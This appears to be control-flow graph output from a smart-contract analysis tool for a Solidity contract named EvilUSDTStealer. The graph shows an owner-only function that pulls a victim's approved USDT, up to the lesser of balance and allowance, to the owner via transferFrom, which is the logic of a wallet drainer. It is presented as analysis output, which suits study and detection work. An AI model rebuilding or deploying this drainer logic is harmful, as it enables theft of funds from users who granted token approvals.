Contract: IERC20
==================================================


Contract: EvilUSDTStealer
==================================================

Function: constructor
------------------------------
Nodes:
  ID: 0
  Type: NodeType.ENTRYPOINT
  Expression: 

  ID: 1
  Type: NodeType.EXPRESSION
  Expression: owner = msg.sender

  ID: 2
  Type: NodeType.EXPRESSION
  Expression: usdt = IERC20(0xdAC17F958D2ee523a2206206994597C13D831ec7)

Edges:
  0 -> 1
  1 -> 2

Function: stealFrom
------------------------------
Nodes:
  ID: 0
  Type: NodeType.ENTRYPOINT
  Expression: 

  ID: 1
  Type: NodeType.EXPRESSION
  Expression: require(bool,string)(msg.sender == owner,Only owner can steal)

  ID: 2
  Type: NodeType.VARIABLE
  Expression: balance = usdt.balanceOf(victim)

  ID: 3
  Type: NodeType.VARIABLE
  Expression: allowanceAmount = usdt.allowance(victim,address(this))

  ID: 5
  Type: NodeType.EXPRESSION
  Expression: require(bool,string)(amount > 0,Nothing to steal)

  ID: 6
  Type: NodeType.VARIABLE
  Expression: success = usdt.transferFrom(victim,owner,amount)

  ID: 7
  Type: NodeType.EXPRESSION
  Expression: require(bool,string)(success,USDT transfer failed)

  ID: 8
  Type: NodeType.IF
  Expression: balance < allowanceAmount

  ID: 9
  Type: NodeType.EXPRESSION
  Expression: amount = balance

  ID: 10
  Type: NodeType.EXPRESSION
  Expression: amount = allowanceAmount

  ID: 11
  Type: NodeType.ENDIF
  Expression: 

Edges:
  0 -> 1
  1 -> 2
  2 -> 3
  3 -> 8
  5 -> 6
  6 -> 7
  8 -> 9
  8 -> 10
  9 -> 11
  10 -> 11
  11 -> 5


